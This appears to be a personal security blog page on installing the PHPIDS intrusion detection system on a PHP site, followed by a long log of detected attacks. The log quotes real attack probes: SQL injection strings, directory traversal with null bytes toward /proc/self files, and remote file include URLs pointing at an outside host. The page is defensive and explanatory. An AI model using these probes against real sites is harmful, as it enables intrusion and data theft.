Help Irongeek.com pay for
bandwidth and research equipment:

Web Hosting By:


Sponsored by:

Google
Affiliates:
















Irongeek's Featured Links:

Web Hosting

Web Hosting

Free Web Hosting hosting

Keylogger

Document Scanning

Free Domain Names

Notebooks

Recover Data

Free Antivirus

hosted exchange 2007

EC-Council ECSA Training Videos









































Web Hosting:
Help Irongeek.com pay for bandwidth and research equipment:

 

AddThis Feed Button PHPIDS Installation and Test Page

PHPIDS Installation and Test Page


        Since my page is mostly a home grown ghetto PHP CMS, I was interested in seeing what sort of attacks were being thrown against it. I found a project online Called PHPIDS, and here are my notes on installing it along with a list of recent attacks as reported by the IDS.

    1. First, download the PHPIDS from http://php-ids.org/downloads/ and extract it.

    2. I uploaded everything in the directory lib and below to my web folder.

    3. I'm a noob when it comes to MySQL, so I set up a new database in MySQL using the PHPMyAdmin front end. In the file lib\IDS\Log\Database.php you will find how the DB has to be set up. What it amounted to for me was just creating the needed table using the SQL command:

CREATE TABLE IF NOT EXISTS `intrusions` (
`id` int(11) unsigned NOT null auto_increment,
`name` varchar(128) NOT null,
`value` text NOT null,
`page` varchar(255) NOT null,
`ip` varchar(15) NOT null,
`impact` int(11) unsigned NOT null,
`origin` varchar(15) NOT null,
`created` datetime NOT null,
PRIMARY KEY (`id`)
) ENGINE=MyISAM ;


    4. By default, the Config.ini file is in \lib\IDS\Config. This is where you need to set up your database name, password, email address etc. Obviously, you don't want to leave this someplace where folks can just download it, in my case I moved it one folder up from the web root where thePHP install could still get to it (see note about paths in the next section) but a web browser hopefully can not. I also set mine to ignore some Google cookies by adding this to the Config.ini:

exceptions[] = __utmz
exceptions[] = __utmc
exceptions[] = COOKIE.__utmz
exceptions[] = COOKIE.__utmc
exceptions[] = REQUEST.__utmz
exceptions[] = REQUEST.__utmc


    5. I then created the following stub file (idsstub.php) to initiate the IDS:

<?php //Set where the relative IDS directory is (IDS parent folder), no leading or trailing slashes. Change this PATH.
$IDSLoc= "lib";
set_include_path(
get_include_path()
.
PATH_SEPARATOR
. $IDSLoc . '/'
);
/*
if (!session_id()) {
session_start();
}
*/
//Make sure the line below is set to the right path. Change this PATH.
require_once $IDSLoc . '/IDS/Init.php';
try {
$request = array(
'REQUEST' => $_REQUEST,
'GET' => $_GET,
'POST' => $_POST,
'COOKIE' => $_COOKIE,
'SERVER' => $_SERVER["HTTP_HOST"],
//Uncomment the next line if you want to check the user agent, but you may get a lot of false positives
//'USERAGENT' => $_SERVER["HTTP_USER_AGENT"],
'ACCEPT' => $_SERVER["HTTP_ACCEPT "]

);
//By default, the config is in an insecure place where it can be downloaded, I moved it one directory up from my root web folder. Change this PATH.
$init = IDS_Init::init('/home/.giga/irongeek/Config.ini');
$init->config['General']['base_path'] = dirname(__FILE__) . '/' . $IDSLoc . '/IDS/';
$init->config['General']['use_base_path'] = true;
$init->config['Caching']['caching'] = 'none';
$ids = new IDS_Monitor($request, $init);
$result = $ids->run();
if (!$result->isEmpty()) {
//echo $result
?>
<div style="position:fixed; right:180px; bottom:10px; overflow:visible;" id="clippy">
<table valign="top" width="130" height="309" border="0" background="http://www.irongeek.com/images/clippy.png" cellpadding="10">
<tr><td
valign="top"><font size="1">
&nbsp;Hello, according to <a href="http://php-ids.org/">PHPIDS</a> it looks like you are trying to pwn my site.
Would you like
<a href="http://www.irongeek.com/i.php?page=videos/owasp-top-5-louisville">some help with that?</a>
</font></td></tr>
</table> </div>
<?
require_once 'IDS/Log/File.php';
require_once 'IDS/Log/Composite.php';
$compositeLog = new IDS_Log_Composite();
$compositeLog->addLogger(IDS_Log_File::getInstance($init));
require_once 'IDS/Log/Email.php';
require_once 'IDS/Log/Database.php';
$compositeLog->addLogger(
IDS_Log_Email::getInstance($init),
IDS_Log_Database::getInstance($init)
);

$compositeLog->execute($result);
} else {
echo 'Alls good, in the hood.';
}
}
catch (Exception $e) {
printf(
'An error occured: %s',
$e->getMessage()
);
}
?>


    Things you will want to note: There are several places where you will need to change your path so it knows where the files are. I've noted them in the code above with the comment "Change this PATH." Setting the right paths is the biggest pain, and sorry, but I can't help you on your personal install. Also, make sure you point the config file to wherever you put Config.ini . I've also changed some of the user submitted data that the IDS checks. Folks can possibly slip in attacks via the HTTP ACCEPT for USER AGENT header fields. I had to comment out my user agent check as it caused too many false positive. On mine, I set it to pop up an image like the following if folks try to attack my site:



It's fun to be a wiseass to attackers. All hail Clippy!!!

    6. On every page I wanted to track attacks, I added the following line of PHP:
include ("idsstub.php");
In my case, I just put it in my footer.

    7. That's pretty much it. Check out my log below of the last 2000 detected attacks, mostly it's folks trying RFI (remote file includes):

ID:123397
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-04 08:41:46
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123398
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-04 08:41:46
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123395
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-04 08:40:15
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123396
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-04 08:40:15
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123393
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-04 08:39:54
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123394
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-04 08:39:54
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123391
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-04 08:39:33
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123392
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-04 08:39:33
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123389
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-04 08:39:13
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123390
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-04 08:39:13
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123387
Name:REQUEST.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-04 08:38:07
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123388
Name:GET.a
Value:or1=1--
Page:/?a=or1=1--
IP:67.195.111.36
Impact:6
Created:2010-05-04 08:38:07
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:123385
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-05-04 07:10:48
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:123386
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-05-04 07:10:48
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:123383
Name:REQUEST.page
Value:http://0x0134.lan.io/pb.php?
Page:/i.php?page=http://0x0134.lan.io/pb.php?
IP:213.211.230.78
Impact:10
Created:2010-05-04 06:07:37
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123384
Name:GET.page
Value:http://0x0134.lan.io/pb.php?
Page:/i.php?page=http://0x0134.lan.io/pb.php?
IP:213.211.230.78
Impact:10
Created:2010-05-04 06:07:37
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123382
Name:GET.page
Value:security/ipinfo and 0=1 union select
Page:/i.php?page=security/ipinfo+and+0=1+union+select+
IP:188.24.59.148
Impact:20
Created:2010-05-04 05:47:39
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123381
Name:REQUEST.page
Value:security/ipinfo and 0=1 union select
Page:/i.php?page=security/ipinfo+and+0=1+union+select+
IP:188.24.59.148
Impact:20
Created:2010-05-04 05:47:38
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123379
Name:REQUEST.page
Value:security/ipinfo and 0=1 union select
Page:/i.php?page=security/ipinfo+and+0=1+union+select+
IP:188.24.59.148
Impact:20
Created:2010-05-04 05:40:02
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123380
Name:GET.page
Value:security/ipinfo and 0=1 union select
Page:/i.php?page=security/ipinfo+and+0=1+union+select+
IP:188.24.59.148
Impact:20
Created:2010-05-04 05:40:02
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123377
Name:REQUEST.page
Value:security/networkprinterhacking' and 1=2 and ''='
Page:/i.php?page=security/networkprinterhacking'%20and%201=2%20and%20''='
IP:222.36.118.28
Impact:46
Created:2010-05-04 03:31:41
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:123378
Name:GET.page
Value:security/networkprinterhacking' and 1=2 and ''='
Page:/i.php?page=security/networkprinterhacking'%20and%201=2%20and%20''='
IP:222.36.118.28
Impact:46
Created:2010-05-04 03:31:41
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:123375
Name:REQUEST.page
Value:security/networkprinterhacking' and 1=1 and ''='
Page:/i.php?page=security/networkprinterhacking'%20and%201=1%20and%20''='
IP:222.36.118.28
Impact:46
Created:2010-05-04 03:30:33
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:123376
Name:GET.page
Value:security/networkprinterhacking' and 1=1 and ''='
Page:/i.php?page=security/networkprinterhacking'%20and%201=1%20and%20''='
IP:222.36.118.28
Impact:46
Created:2010-05-04 03:30:33
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43
Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
Description: Detects chained SQL injection attempts 2/2 | Tags: sqli, id | ID: 49

ID:123373
Name:REQUEST.task
Value:../../../../../../../../../../../../../../../proc/self/MILDNet
Page:/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00
IP:89.108.70.47
Impact:30
Created:2010-05-04 01:11:27
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123374
Name:GET.task
Value:../../../../../../../../../../../../../../../proc/self/MILDNet
Page:/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00
IP:89.108.70.47
Impact:30
Created:2010-05-04 01:11:27
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123371
Name:REQUEST.task
Value:../../../../../../../../../../../../../../../proc/self/MILDNet
Page:/security-podcasts.php/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00
IP:89.108.70.47
Impact:30
Created:2010-05-04 01:11:25
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123372
Name:GET.task
Value:../../../../../../../../../../../../../../../proc/self/MILDNet
Page:/security-podcasts.php/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00
IP:89.108.70.47
Impact:30
Created:2010-05-04 01:11:25
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123369
Name:REQUEST.task
Value:../../../../../../../../../../../../../../../proc/self/MILDNet
Page:/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00
IP:89.108.70.47
Impact:30
Created:2010-05-04 00:38:55
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123370
Name:GET.task
Value:../../../../../../../../../../../../../../../proc/self/MILDNet
Page:/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00
IP:89.108.70.47
Impact:30
Created:2010-05-04 00:38:55
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123367
Name:REQUEST.task
Value:../../../../../../../../../../../../../../../proc/self/MILDNet
Page:/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00
IP:89.108.70.47
Impact:30
Created:2010-05-04 00:34:05
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123368
Name:GET.task
Value:../../../../../../../../../../../../../../../proc/self/MILDNet
Page:/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00
IP:89.108.70.47
Impact:30
Created:2010-05-04 00:34:05
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123365
Name:REQUEST.page
Value:security/ps2-and-usb-hardware-keyloggers-3-keyllama and 0=1 union select
Page:/i.php?page=security/ps2-and-usb-hardware-keyloggers-3-keyllama+and+0=1+union+select+
IP:123.26.81.33
Impact:20
Created:2010-05-03 23:21:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123366
Name:GET.page
Value:security/ps2-and-usb-hardware-keyloggers-3-keyllama and 0=1 union select
Page:/i.php?page=security/ps2-and-usb-hardware-keyloggers-3-keyllama+and+0=1+union+select+
IP:123.26.81.33
Impact:20
Created:2010-05-03 23:21:10
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123363
Name:REQUEST.page
Value:security/usb-hardware-keyloggers-1-keycarbon and 0=1 union select
Page:/i.php?page=security/usb-hardware-keyloggers-1-keycarbon+and+0=1+union+select+
IP:123.26.81.33
Impact:20
Created:2010-05-03 23:21:08
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123364
Name:GET.page
Value:security/usb-hardware-keyloggers-1-keycarbon and 0=1 union select
Page:/i.php?page=security/usb-hardware-keyloggers-1-keycarbon+and+0=1+union+select+
IP:123.26.81.33
Impact:20
Created:2010-05-03 23:21:08
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123361
Name:REQUEST.page
Value:security/ps2-and-usb-hardware-keyloggers-3-keyllama and 0=1 union select
Page:/i.php?page=security/ps2-and-usb-hardware-keyloggers-3-keyllama+and+0=1+union+select+
IP:123.26.81.33
Impact:20
Created:2010-05-03 23:19:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123362
Name:GET.page
Value:security/ps2-and-usb-hardware-keyloggers-3-keyllama and 0=1 union select
Page:/i.php?page=security/ps2-and-usb-hardware-keyloggers-3-keyllama+and+0=1+union+select+
IP:123.26.81.33
Impact:20
Created:2010-05-03 23:19:44
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123359
Name:REQUEST.page
Value:security/usb-hardware-keyloggers-1-keycarbon and 0=1 union select
Page:/i.php?page=security/usb-hardware-keyloggers-1-keycarbon+and+0=1+union+select+
IP:123.26.81.33
Impact:20
Created:2010-05-03 23:19:38
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123360
Name:GET.page
Value:security/usb-hardware-keyloggers-1-keycarbon and 0=1 union select
Page:/i.php?page=security/usb-hardware-keyloggers-1-keycarbon+and+0=1+union+select+
IP:123.26.81.33
Impact:20
Created:2010-05-03 23:19:38
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123357
Name:REQUEST.show
Value:../../../../../../../../../../../../../../../proc/self/MILDNet
Page://index.php?module=admin&show=../../../../../../../../../../../../../../../proc/self/MILDNet%00
IP:89.108.70.47
Impact:30
Created:2010-05-03 21:38:08
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123358
Name:GET.show
Value:../../../../../../../../../../../../../../../proc/self/MILDNet
Page://index.php?module=admin&show=../../../../../../../../../../../../../../../proc/self/MILDNet%00
IP:89.108.70.47
Impact:30
Created:2010-05-03 21:38:08
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123355
Name:REQUEST.page
Value:zaurusmain?lastverified=07-MAR-2004
Page:/i.php?submenu=zaurusheader&page=zaurusmain?lastverified=07-MAR-2004
IP:67.195.111.36
Impact:10
Created:2010-05-03 19:46:37
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:123356
Name:GET.page
Value:zaurusmain?lastverified=07-MAR-2004
Page:/i.php?submenu=zaurusheader&page=zaurusmain?lastverified=07-MAR-2004
IP:67.195.111.36
Impact:10
Created:2010-05-03 19:46:37
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:123353
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=videos/myslax
Page:/i.php?page=security/hackingillustrated/i.php?page=videos/myslax
IP:96.31.86.184
Impact:10
Created:2010-05-03 19:13:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123354
Name:GET.page
Value:security/hackingillustrated/i.php?page=videos/myslax
Page:/i.php?page=security/hackingillustrated/i.php?page=videos/myslax
IP:96.31.86.184
Impact:10
Created:2010-05-03 19:13:13
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123351
Name:REQUEST.page
Value:%00
Page:/i.php?page=%2500&mode=print
IP:67.195.111.36
Impact:10
Created:2010-05-03 16:43:50
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123352
Name:GET.page
Value:%00
Page:/i.php?page=%2500&mode=print
IP:67.195.111.36
Impact:10
Created:2010-05-03 16:43:50
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123349
Name:REQUEST.page
Value:''
Page:/i.php?page=''
IP:208.80.193.39
Impact:12
Created:2010-05-03 13:04:28
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:123350
Name:GET.page
Value:''
Page:/i.php?page=''
IP:208.80.193.39
Impact:12
Created:2010-05-03 13:04:28
Details:
Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42

ID:123347
Name:REQUEST.page
Value:suckmydick.phpsecurity/madmacs-mac-spoofer
Page:/i.php?page=suckmydick.php%00security/madmacs-mac-spoofer
IP:202.152.243.139
Impact:10
Created:2010-05-03 09:25:22
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123348
Name:GET.page
Value:suckmydick.phpsecurity/madmacs-mac-spoofer
Page:/i.php?page=suckmydick.php%00security/madmacs-mac-spoofer
IP:202.152.243.139
Impact:10
Created:2010-05-03 09:25:22
Details:
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123345
Name:REQUEST.page
Value:security/ps2 and 0=1 union select -and-usb-hardware-keyloggers-3-keyllama
Page:/i.php?page=security/ps2+and+0=1+union+select+-and-usb-hardware-keyloggers-3-keyllama
IP:118.71.149.247
Impact:20
Created:2010-05-03 08:59:47
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123346
Name:GET.page
Value:security/ps2 and 0=1 union select -and-usb-hardware-keyloggers-3-keyllama
Page:/i.php?page=security/ps2+and+0=1+union+select+-and-usb-hardware-keyloggers-3-keyllama
IP:118.71.149.247
Impact:20
Created:2010-05-03 08:59:47
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55

ID:123343
Name:REQUEST.bcsi-ac-C79501543DEBC235
Value:1AD20D21000000054Dt4IkDDjTJfqvEIK5xS62KBT90oAAAABQAAAFmpJQCAcAAAAgAAAP0GAQA=
Page:/?bcsi-ac-C79501543DEBC235=1AD20D21000000054Dt4IkDDjTJfqvEIK5xS62KBT90oAAAABQAAAFmpJQCAcAAAAgAAAP0GAQA=
IP:74.86.107.156
Impact:28
Created:2010-05-03 07:12:48
Details:
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.1666666666667
Converted: (((++:

ID:123344
Name:GET.bcsi-ac-C79501543DEBC235
Value:1AD20D21000000054Dt4IkDDjTJfqvEIK5xS62KBT90oAAAABQAAAFmpJQCAcAAAAgAAAP0GAQA=
Page:/?bcsi-ac-C79501543DEBC235=1AD20D21000000054Dt4IkDDjTJfqvEIK5xS62KBT90oAAAABQAAAFmpJQCAcAAAAgAAAP0GAQA=
IP:74.86.107.156
Impact:28
Created:2010-05-03 07:12:48
Details:
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.1666666666667
Converted: (((++:

ID:123341
Name:REQUEST.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-05-03 07:12:44
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:123342
Name:COOKIE.BCSI-AC-4E050338BC5CF7E7
Value:1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA=
Page:/
IP:170.167.4.200
Impact:22
Created:2010-05-03 07:12:44
Details:
Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 3.0769230769231
Converted: ((++:

ID:123339
Name:REQUEST.page
Value:videos/pn12/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
Page:/i.php?page=videos/pn12/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
IP:184.73.73.48
Impact:10
Created:2010-05-03 04:27:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123340
Name:GET.page
Value:videos/pn12/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
Page:/i.php?page=videos/pn12/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana
IP:184.73.73.48
Impact:10
Created:2010-05-03 04:27:07
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123337
Name:REQUEST.page
Value:videos/pn12/i.php?page=hoosier
Page:/i.php?page=videos/pn12/i.php?page=hoosier
IP:184.73.73.48
Impact:10
Created:2010-05-03 04:26:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123338
Name:GET.page
Value:videos/pn12/i.php?page=hoosier
Page:/i.php?page=videos/pn12/i.php?page=hoosier
IP:184.73.73.48
Impact:10
Created:2010-05-03 04:26:19
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:123335
Name:REQUEST.task
Value:../../../../../../../../../../../../../../../proc/self/MILDNet
Page:/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00
IP:89.108.70.47
Impact:30
Created:2010-05-03 03:56:58
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123336
Name:GET.task
Value:../../../../../../../../../../../../../../../proc/self/MILDNet
Page:/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/MILDNet%00
IP:89.108.70.47
Impact:30
Created:2010-05-03 03:56:58
Details:
Description: Detects basic directory traversal | Tags: dt, id, lfi | ID: 10
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID: 11
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:123333
Name:REQUEST.page
Value:security/?page=security/hackingillustrated'/**/XoR/**/'8'='8
Page:/i.php?page=security/?page=security/hackingillustrated%27/**/XoR/**/%278%27%3D%278
IP:60.4.51.66
Impact:66
Created:2010-05-03 02:40:41
Details:
Description: finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID: 2
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
